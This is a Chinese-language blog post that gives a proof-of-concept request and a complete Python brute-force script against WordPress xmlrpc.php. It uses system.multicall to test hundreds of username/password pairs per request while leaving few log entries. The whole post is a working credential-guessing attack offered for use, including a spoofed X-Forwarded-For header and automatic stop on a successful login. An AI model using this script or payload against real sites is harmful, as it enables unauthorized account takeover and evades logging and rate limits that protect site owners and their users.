通过xmlrpc暴力破解wordpress(单请求多组帐户密码)含exp

利用xmlrpc.php来进行账号的暴力破解，原文：https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html

只是给出POC。

以往的文章都是一请求一组账号密码的。这个是一请求多组账号密码的。一个请求里加一千组账号密码没问题。日志里也就几条xmlrpc日志。

通过查看官方文档写成如下EXP：

POST /wp/wordpress//xmlrpc.php HTTP/1.1 Host: weisuo.org Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; [email protected]) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1196  <?xml version="1.0"?> <methodCall><methodName>system.multicall</methodName> <params><param><value><array><data><value>        <struct>         <member>          <name>methodName</name>          <value><string>wp.getCategories</string></value>         </member>         <member>          <name>params</name>          <value>           <array>            <data>             <value><string>1</string></value> <value><string>c4bbage</string></value> <value><string>11</string></value>            </data>           </array>          </value>         </member>        </struct>       </value>       <value>       <struct>         <member>          <name>methodName</name>          <value><string>wp.getCategories</string></value>         </member>         <member>          <name>params</name>          <value>           <array>            <data>             <value><string>1</string></value> <value><string>c4bbage</string></value> <value><string>123456zz</string></value>            </data>           </array>          </value>         </member>        </struct>       </value>      </data>     </array>    </value>   </param>  </params> </methodCall>

weibo:http://weibo.com/s4turnus 

#参考https://code.google.com/p/gi-torrent/wiki/system_multicall

 利用脚本

# coding=utf-8 # author:[email protected] # weibo:http://weibo.com/s4turnus  import requests import httplib import urlparse import io import argparse   def post(host, pl, port=80,  path='/xmlrpc.php'):     postHead = {"Host": host, "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0、c4bbage@weisuo", "X-Forwarded-For": host, 'Content-Type':                 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'keep-alive'}     postcontent = '''<?xml version="1.0"?>         <methodCall><methodName>system.multicall</methodName> <params><param><value><array><data>[pl]     </data>         </array>   </value>    </param>    </params>    </methodCall>         '''     resultHtml = httplib.HTTPConnection(host.split(":")[0], port, False)     resultHtml.request(         'POST', path, body=postcontent.replace('[pl]', pl), headers=postHead)     page = resultHtml.getresponse()     pageConect = page.read()     return pageConect   def main():     parser = argparse.ArgumentParser(         description='wordpress brute force tool. This is a multi-group account password request. A request Riga one thousand group account password no problem. Xmlrpc will log a few logs.. /nby c4bbage http://weibo.com/s4turnus')      parser.add_argument('-t',                         action="store",                         dest="url",                         required=True,                         help='exp: -t http://weisuo.org/xmlrpc.php'                         )     parser.add_argument('-u',                         action="store",                         dest="userfile",                         required=True,                         help='exp: -u username.txt',                         type=argparse.FileType('r')                         )     parser.add_argument('-p',                         action="store",                         dest="pwdfile",                         required=True,                         help='exp: -p password.txt',                         type=argparse.FileType('r')                         )      args = parser.parse_args()     url = urlparse.urlparse(args.url)     userfile = args.userfile     pwdfile = args.pwdfile     if(url.netloc.index(':') > 0):         urlport = url.netloc.split(":")[1]     else:         urlport = 80     # 每个请求999组账号密码     t = 999     users = userfile.readlines()     pwds = pwdfile.readlines()     pl = '''     <value><struct><member>         <name>methodName</name>             <value><string>wp.getCategories</string></value>             </member>         <member>         <name>params</name>         <value><array><data>             <value><string>1</string></value>             <value><string>[username]</string></value>             <value><string>[pwd]</string></value>         </data></array></value>     </member></struct></value>'''      up = [[u.strip(), p.strip()] for u in users for p in pwds]     i = 0     apl = ''     while i <= len(up) / t:         apl = ''         s = i * t         for a in up[s:s + t]:             apl += pl.replace('[username]', a[0]).replace('[pwd]', a[1])             pass         res = post(host=url.netloc, port=urlport, pl=apl, path=url.path)         #   提取结果         if(res.find("categoryDescription") > 0):             rr = 0             for r in res.split("</struct></value>"):                 if(r.find("categoryDescription") > 0):                     print up[s:s + t][rr]                      # 成功后退出                     exit()                     pass                 rr += 1         i += 1         pass  if __name__ == '__main__':     main()